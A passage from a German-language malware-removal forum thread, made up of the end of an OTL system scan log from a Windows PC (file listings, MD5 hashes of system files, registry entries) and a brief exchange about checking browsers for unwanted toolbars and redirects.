[2013.02.19 20:30:05 | 000,000,884 | ---- | C] () -- C:\Windows\tasks\Adobe Flash Player Updater.job

[2013.02.19 20:13:29 | 000,000,804 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk

[2013.02.19 19:34:57 | 2073,313,280 | -HS- | C] () -- C:\hiberfil.sys

[2013.02.19 18:17:22 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe

[2013.02.19 18:17:22 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe

[2013.02.19 18:17:22 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe

[2013.02.19 18:17:22 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe

[2013.02.19 18:17:22 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe

[2013.02.18 21:29:48 | 000,021,751 | ---- | C] () -- C:\Users\TuS\.recently-used.xbel

[2012.10.21 13:20:44 | 000,000,496 | ---- | C] () -- C:\Users\TuS\AppData\Roaming\burnaware.ini

[2012.10.16 11:03:56 | 000,000,000 | ---- | C] () -- C:\Windows\System32\cd.dat

[2012.09.17 18:11:49 | 000,438,272 | ---- | C] () -- C:\Windows\System32\PaintX.dll

[2012.09.11 20:07:01 | 000,224,118 | ---- | C] () -- C:\Users\TuS\01108_yaquinaheadlighthouse_1280x800.jpg

[2012.06.03 16:11:50 | 000,000,021 | ---- | C] () -- C:\Users\TuS\.gtk-bookmarks

[2012.05.10 18:25:22 | 000,201,488 | ---- | C] () -- C:\Windows\System32\MACD32.DLL

[2012.05.10 18:25:22 | 000,144,144 | ---- | C] () -- C:\Windows\System32\MASE32.DLL

[2012.05.10 18:25:22 | 000,141,584 | ---- | C] () -- C:\Windows\System32\MAMC32.DLL

[2012.05.10 18:25:22 | 000,063,248 | ---- | C] () -- C:\Windows\System32\MASD32.DLL

[2012.05.10 18:25:22 | 000,033,040 | ---- | C] () -- C:\Windows\System32\MA32.DLL

[2012.04.03 11:20:55 | 000,000,403 | ---- | C] () -- C:\Windows\ODBC.INI

[2011.02.21 18:56:09 | 000,117,248 | ---- | C] () -- C:\Windows\System32\EhStorAuthn.dll

[2011.02.21 18:56:09 | 000,107,612 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchema.bin

[2011.02.21 18:18:14 | 000,018,904 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchemaTrivial.bin

[2011.02.19 18:56:07 | 000,017,089 | ---- | C] () -- C:\Users\TuS\AppData\Roaming\UserTile.png

[2011.02.18 17:57:29 | 000,068,096 | ---- | C] () -- C:\Users\TuS\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

[2011.02.18 16:50:52 | 000,001,356 | ---- | C] () -- C:\Users\TuS\AppData\Local\d3d9caps.dat

 
 ========== ZeroAccess Check ==========

 

[2006.11.02 13:51:16 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

 

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

 

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

 

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2012.06.08 18:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

 

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.04.11 07:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

 

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

"" = %systemroot%\system32\wbem\wbemess.dll -- [2009.04.11 07:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

 
 ========== LOP Check ==========

 

[2012.05.16 18:58:18 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\DesktopIconForAmazon

[2013.02.19 11:31:11 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\FileZilla

[2013.02.18 21:29:48 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\gtk-2.0

[2011.09.05 16:12:15 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\ICQ

[2011.08.18 01:05:18 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\InfraRecorder

[2013.02.01 23:45:36 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Mp3tag

[2013.02.18 22:57:06 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Notepad++

[2011.09.05 14:10:44 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\OCS

[2011.06.09 20:22:32 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\OpenOffice.org

[2011.09.05 14:10:55 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Opera

[2011.02.19 18:56:06 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\PeerNetworking

[2012.07.02 09:05:32 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\redsn0w

[2011.07.01 11:08:57 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Scribus

[2013.01.05 15:53:20 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\TeamViewer

[2011.07.01 10:56:46 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\Thunderbird

[2012.06.29 11:29:30 | 000,000,000 | ---D | M] -- C:\Users\TuS\AppData\Roaming\WindSolutions

 
 ========== Purity Check ==========

 

 

 
 ========== Custom Scans ==========

 
 < %SYSTEMDRIVE%\*. >

[2013.02.19 19:31:00 | 000,000,000 | -HSD | M] -- C:\$RECYCLE.BIN

[2012.09.06 17:40:28 | 000,000,000 | ---D | M] -- C:\Backup 05.09.2012

[2011.02.21 19:28:10 | 000,000,000 | ---D | M] -- C:\boot

[2013.02.19 20:38:43 | 000,000,000 | ---D | M] -- C:\Config.Msi

[2006.11.02 13:59:44 | 000,000,000 | -HSD | M] -- C:\Documents and Settings

[2009.02.05 12:28:25 | 000,000,000 | -HSD | M] -- C:\Dokumente und Einstellungen

[2008.07.12 07:16:50 | 000,000,000 | ---D | M] -- C:\hp

[2011.02.18 17:57:39 | 000,000,000 | ---D | M] -- C:\Intel

[2009.02.05 16:35:24 | 000,000,000 | R--D | M] -- C:\MSOCache

[2008.01.21 03:43:50 | 000,000,000 | ---D | M] -- C:\PerfLogs

[2013.02.19 20:55:00 | 000,000,000 | R--D | M] -- C:\Program Files

[2013.02.19 21:31:16 | 000,000,000 | ---D | M] -- C:\ProgramData

[2009.02.05 12:28:25 | 000,000,000 | -HSD | M] -- C:\Programme

[2013.02.19 19:31:49 | 000,000,000 | ---D | M] -- C:\Qoobox

[2013.02.19 11:13:56 | 000,000,000 | ---D | M] -- C:\SPG-Verein

[2011.02.19 18:29:32 | 000,000,000 | ---D | M] -- C:\Swsetup

[2013.02.19 21:36:26 | 000,000,000 | -HSD | M] -- C:\System Volume Information

[2011.02.18 17:15:31 | 000,000,000 | ---D | M] -- C:\System.sav

[2012.04.03 11:13:07 | 000,000,000 | ---D | M] -- C:\Temp

[2011.02.18 16:50:49 | 000,000,000 | R--D | M] -- C:\Users

[2013.02.19 20:50:03 | 000,000,000 | ---D | M] -- C:\Windows

 
 < %PROGRAMFILES%\*.exe >

 
 < %LOCALAPPDATA%\*.exe >

 
 < %systemroot%\*. /mp /s >

 
 < C:\Windows\system32\*.tsp >

[2006.11.02 10:44:49 | 000,031,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\hidphone.tsp

[2006.11.02 10:44:49 | 000,038,400 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\kmddsp.tsp

[2006.11.02 10:44:49 | 000,049,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\ndptsp.tsp

[2006.11.02 10:44:49 | 000,081,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\remotesp.tsp

[2009.04.11 07:27:17 | 000,280,064 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\unimdm.tsp

[2006.11.02 13:58:10 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT

[2006.11.02 13:58:10 | 000,032,534 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT

[2013.02.19 20:30:05 | 000,000,884 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job

 
 < MD5 for: AGP440.SYS  >

[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_51b95d75\AGP440.sys

[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_f750e484\AGP440.sys

[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6001.18000_none_ba12ed3bbeb0d97a\AGP440.sys

[2008.01.19 08:42:25 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6002.18005_none_bbfe6647bbd2a4c6\AGP440.sys

[2006.11.02 10:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\erdnt\cache\AGP440.sys

[2006.11.02 10:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\drivers\AGP440.sys

[2006.11.02 10:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_920a2c1f\AGP440.sys

 
 < MD5 for: ATAPI.SYS  >

[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\erdnt\cache\atapi.sys

[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\System32\drivers\atapi.sys

[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_b12d8e84\atapi.sys

[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6002.18005_none_df23a1261eab99e8\atapi.sys

[2008.01.19 08:41:30 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_cc18792d\atapi.sys

[2008.01.19 08:41:30 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6001.18000_none_dd38281a2189ce9c\atapi.sys

[2006.11.02 10:49:36 | 000,019,048 | ---- | M] (Microsoft Corporation) MD5=4F4FCB8B6EA06784FB6D475B7EC7300F -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_c6c2e699\atapi.sys

[2011.02.19 16:35:42 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_7de13c21\atapi.sys

[2011.02.19 16:35:42 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.16632_none_db337a442479c42c\atapi.sys

[2011.02.19 16:35:41 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=E03E8C99D15D0381E02743C36AFC7C6F -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.20757_none_dbac78a93da31a8b\atapi.sys

 
 < MD5 for: CNGAUDIT.DLL  >

[2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\erdnt\cache\cngaudit.dll

[2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\System32\cngaudit.dll

[2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.0.6000.16386_none_e62d292932a96ce6\cngaudit.dll

 
 < MD5 for: EXPLORER.EXE  >

[2011.02.19 16:34:36 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=37440D09DEAE0B672A04DCCF7ABF06BE -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16771_none_4f83bb287ccdb7e3\explorer.exe

[2011.02.19 16:34:35 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=4F554999D7D5F05DAAEBBA7B5BA1089D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18164_none_5177ca9879e978e8\explorer.exe

[2011.02.19 16:34:35 | 002,927,616 | ---- | M] (Microsoft Corporation) MD5=50BA5850147410CDE89C523AD3BC606E -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.22298_none_51e4f8c7931bd1e1\explorer.exe

[2011.02.19 17:04:57 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=6D06CD98D954FE87FB2DB8108793B399 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16549_none_4fac29707cae347a\explorer.exe

[2011.02.19 17:04:57 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=BD06F0BF753BC704B653C3A50F89D362 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20668_none_501f261995dcf2cf\explorer.exe

[2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\erdnt\cache\explorer.exe

[2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\explorer.exe

[2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6002.18005_none_53a0201e76de3a0b\explorer.exe

[2011.02.19 16:34:36 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=E7156B0B74762D9DE0E66BDCDE06E5FB -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20947_none_5033cb5995cd990b\explorer.exe

[2006.11.02 10:45:07 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=FD8C53FB002217F6F888BCF6F5D7084D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16386_none_4f7de5167cd15deb\explorer.exe

[2008.01.19 08:33:10 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=FFA764631CB70A30065C12EF8E174F9F -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18000_none_51b4a71279bc6ebf\explorer.exe

 
 < MD5 for: IASTOR.SYS  >

[2008.04.15 18:54:16 | 000,388,120 | ---- | M] (Intel Corporation) MD5=8D58627FEF3F8767665D9F4DC91CBD97 -- C:\Swsetup\Drivers\64\HDD\IaStor.sys

[2008.04.15 18:54:16 | 000,388,120 | ---- | M] (Intel Corporation) MD5=8D58627FEF3F8767665D9F4DC91CBD97 -- C:\Swsetup\Drivers\Global\INTELMSM\Winall\Driver64\IaStor.sys

[2008.04.15 18:53:44 | 000,312,344 | ---- | M] (Intel Corporation) MD5=DB0CC620B27A928D968C1A1E9CD9CB87 -- C:\Swsetup\Drivers\32\HDD\IaStor.sys

[2008.04.15 18:53:44 | 000,312,344 | ---- | M] (Intel Corporation) MD5=DB0CC620B27A928D968C1A1E9CD9CB87 -- C:\Swsetup\Drivers\Global\INTELMSM\Winall\Driver\IaStor.sys

 
 < MD5 for: IASTORV.SYS  >

[2008.01.19 08:42:51 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_c9df7691\iaStorV.sys

[2008.01.19 08:42:51 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.0.6001.18000_none_af11527887c7fa8f\iaStorV.sys

[2006.11.02 10:51:25 | 000,232,040 | ---- | M] (Intel Corporation) MD5=C957BF4B5D80B46C5017BF0101E6C906 -- C:\Windows\System32\drivers\iaStorV.sys

[2006.11.02 10:51:25 | 000,232,040 | ---- | M] (Intel Corporation) MD5=C957BF4B5D80B46C5017BF0101E6C906 -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_37cdafa4\iaStorV.sys

 
 < MD5 for: NETLOGON.DLL  >

[2006.11.02 10:46:11 | 000,559,616 | ---- | M] (Microsoft Corporation) MD5=889A2C9F2AACCD8F64EF50AC0B3D553B -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6000.16386_none_fb80f5473b0ed783\netlogon.dll

[2009.04.11 07:28:23 | 000,592,896 | ---- | M] (Microsoft Corporation) MD5=95DAECF0FB120A7B5DA679CC54E37DDE -- C:\Windows\erdnt\cache\netlogon.dll

[2009.04.11 07:28:23 | 000,592,896 | ---- | M] (Microsoft Corporation) MD5=95DAECF0FB120A7B5DA679CC54E37DDE -- C:\Windows\System32\netlogon.dll

[2009.04.11 07:28:23 | 000,592,896 | ---- | M] (Microsoft Corporation) MD5=95DAECF0FB120A7B5DA679CC54E37DDE -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6002.18005_none_ffa3304f351bb3a3\netlogon.dll

[2008.01.19 08:35:36 | 000,592,384 | ---- | M] (Microsoft Corporation) MD5=A8EFC0B6E75B789F7FD3BA5025D4E37F -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6001.18000_none_fdb7b74337f9e857\netlogon.dll

 
 < MD5 for: NVSTOR.SYS  >

[2006.11.02 10:50:13 | 000,040,040 | ---- | M] (NVIDIA Corporation) MD5=9E0BA19A28C498A6D323D065DB76DFFC -- C:\Windows\System32\drivers\nvstor.sys

[2006.11.02 10:50:13 | 000,040,040 | ---- | M] (NVIDIA Corporation) MD5=9E0BA19A28C498A6D323D065DB76DFFC -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_733654ff\nvstor.sys

[2008.01.19 08:42:09 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_31c3d71d\nvstor.sys

[2008.01.19 08:42:09 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.0.6001.18000_none_39dac327befea467\nvstor.sys

 
 < MD5 for: SCECLI.DLL  >

[2008.01.19 08:36:19 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=28B84EB538F7E8A0FE8B9299D591E0B9 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6001.18000_none_380de25bd91b6f12\scecli.dll

[2006.11.02 10:46:12 | 000,176,640 | ---- | M] (Microsoft Corporation) MD5=80E2839D05CA5970A86D7BE2A08BFF61 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6000.16386_none_35d7205fdc305e3e\scecli.dll

[2009.04.11 07:28:24 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=8FC182167381E9915651267044105EE1 -- C:\Windows\erdnt\cache\scecli.dll

[2009.04.11 07:28:24 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=8FC182167381E9915651267044105EE1 -- C:\Windows\System32\scecli.dll

[2009.04.11 07:28:24 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=8FC182167381E9915651267044105EE1 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6002.18005_none_39f95b67d63d3a5e\scecli.dll

 
 < MD5 for: USER32.DLL  >

[2011.02.19 14:18:15 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=63B4F59D7C89B1BF5277F1FFEFD491CD -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.16438_none_cb39bc5b7047127e\user32.dll

[2009.04.11 07:28:25 | 000,627,712 | ---- | M] (Microsoft Corporation) MD5=75510147B94598407666F4802797C75A -- C:\Windows\erdnt\cache\user32.dll

[2011.02.19 14:18:15 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=9D9F061EDA75425FC67F0365E3467C86 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.20537_none_cbc258dc896598f1\user32.dll

[2008.01.19 08:36:46 | 000,627,200 | ---- | M] (Microsoft Corporation) MD5=B974D9F06DC7D1908E825DC201681269 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6001.18000_none_cd386c416d5c7f32\user32.dll

[2006.11.02 10:46:13 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=E698A5437B89A285ACA3FF022356810A -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.16386_none_cb01aa4570716e5e\user32.dll

[2009.04.11 07:28:25 | 000,627,712 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\System32\user32.dll

[2009.04.11 07:28:25 | 000,627,712 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6002.18005_none_cf23e54d6a7e4a7e\user32.dll

 
 < MD5 for: USERINIT.EXE  >

[2008.01.19 08:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\erdnt\cache\userinit.exe

[2008.01.19 08:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\System32\userinit.exe

[2008.01.19 08:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6001.18000_none_dc28ba15d1aff80b\userinit.exe

[2006.11.02 10:45:50 | 000,024,576 | ---- | M] (Microsoft Corporation) MD5=22027835939F86C3E47AD8E3FBDE3D11 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6000.16386_none_d9f1f819d4c4e737\userinit.exe

 
 < MD5 for: WINLOGON.EXE  >

[2009.04.11 07:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\erdnt\cache\winlogon.exe

[2009.04.11 07:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\System32\winlogon.exe

[2009.04.11 07:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6002.18005_none_71ae7a22d2134741\winlogon.exe

[2006.11.02 10:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) MD5=9F75392B9128A91ABAFB044EA350BAAD -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6000.16386_none_6d8c3f1ad8066b21\winlogon.exe

[2008.01.19 08:33:37 | 000,314,880 | ---- | M] (Microsoft Corporation) MD5=C2610B6BDBEFC053BBDAB4F1B965CB24 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6001.18000_none_6fc30116d4f17bf5\winlogon.exe

 
 < MD5 for: WS2IFSL.SYS  >

[2006.11.02 09:58:26 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=84620AECDCFD2A7A14E6263927D8C0ED -- C:\Windows\winsxs\x86_microsoft-windows-w..rastructure-ws2ifsl_31bf3856ad364e35_6.0.6000.16386_none_4d4fded8cae2956d\ws2ifsl.sys

[2008.01.19 06:56:49 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=E3A3CB253C0EC2494D4A61F5E43A389C -- C:\Windows\System32\drivers\ws2ifsl.sys

[2008.01.19 06:56:49 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=E3A3CB253C0EC2494D4A61F5E43A389C -- C:\Windows\winsxs\x86_microsoft-windows-w..rastructure-ws2ifsl_31bf3856ad364e35_6.0.6001.18000_none_4f86a0d4c7cda641\ws2ifsl.sys

 
 < %systemroot%\system32\drivers\*.sys /lockedfiles >

 
 < %systemroot%\System32\config\*.sav >

[2006.11.02 11:34:05 | 000,008,192 | ---- | M] () -- C:\Windows\System32\config\COMPONENTS.SAV

[2006.11.02 11:34:05 | 000,020,480 | ---- | M] () -- C:\Windows\System32\config\DEFAULT.SAV

[2006.11.02 11:34:05 | 000,008,192 | ---- | M] () -- C:\Windows\System32\config\SECURITY.SAV

[2006.11.02 11:34:08 | 010,133,504 | ---- | M] () -- C:\Windows\System32\config\SOFTWARE.SAV

[2006.11.02 11:34:08 | 001,826,816 | ---- | M] () -- C:\Windows\System32\config\SYSTEM.SAV

 
 < %systemroot%\system32\*.dll /lockedfiles >

 
 < %USERPROFILE%\*.* >

[2012.06.03 16:11:51 | 000,000,021 | ---- | M] () -- C:\Users\TuS\.gtk-bookmarks

[2013.02.18 21:29:48 | 000,021,751 | ---- | M] () -- C:\Users\TuS\.recently-used.xbel

[2012.09.11 20:05:02 | 000,224,118 | ---- | M] () -- C:\Users\TuS\01108_yaquinaheadlighthouse_1280x800.jpg

[2013.02.19 21:47:48 | 002,097,152 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT

[2013.02.19 21:47:48 | 000,262,144 | -H-- | M] () -- C:\Users\TuS\ntuser.dat.LOG1

[2011.02.18 16:50:49 | 000,000,000 | -H-- | M] () -- C:\Users\TuS\ntuser.dat.LOG2

[2013.02.19 21:27:11 | 000,065,536 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TM.blf

[2013.02.19 21:27:11 | 000,524,288 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TMContainer00000000000000000001.regtrans-ms

[2011.02.18 17:19:44 | 000,524,288 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TMContainer00000000000000000002.regtrans-ms

[2011.02.18 16:50:50 | 000,000,020 | -HS- | M] () -- C:\Users\TuS\ntuser.ini

[2012.11.20 19:18:36 | 000,047,432 | ---- | M] () -- C:\Users\TuS\umbrella0.log

 
 < %USERPROFILE%\Local Settings\Temp\*.exe >

 
 < %USERPROFILE%\Local Settings\Temp\*.dll >

 
 < %USERPROFILE%\Application Data\*.exe >

 
 < HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs >

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Required: DebugWindows [binary data]

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Windows: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16

 
 <           >
 

< End of report >

--- --- ---

hi
teste bitte Browser, auch den ie, ob es ungewollte Umleitungen, Toolbars etc gibt, teste wie der PC und sonstige Programme laufen

Eine Toolbar habe ich gefunden und deinstalliert, die war von gutscheindoktor.de. Wie kann ich die Browser auf Umleitung prüfen? Ansonsten ist mir nichts auffälliges am PC oder an Programmen aufgefallen, alles läuft flüssig und ohne Probleme. Auch irgendwelche merkwürdigen Einstellungen hab ich jetzt nicht entdeckt.

Hi,
